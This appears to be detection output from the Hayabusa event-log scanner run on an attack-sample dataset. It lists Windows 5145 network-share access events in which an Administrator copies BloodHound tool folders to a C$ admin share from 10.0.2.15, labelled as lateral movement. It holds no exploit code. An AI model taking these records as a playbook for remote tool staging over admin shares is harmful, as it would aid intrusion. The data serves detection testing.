10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 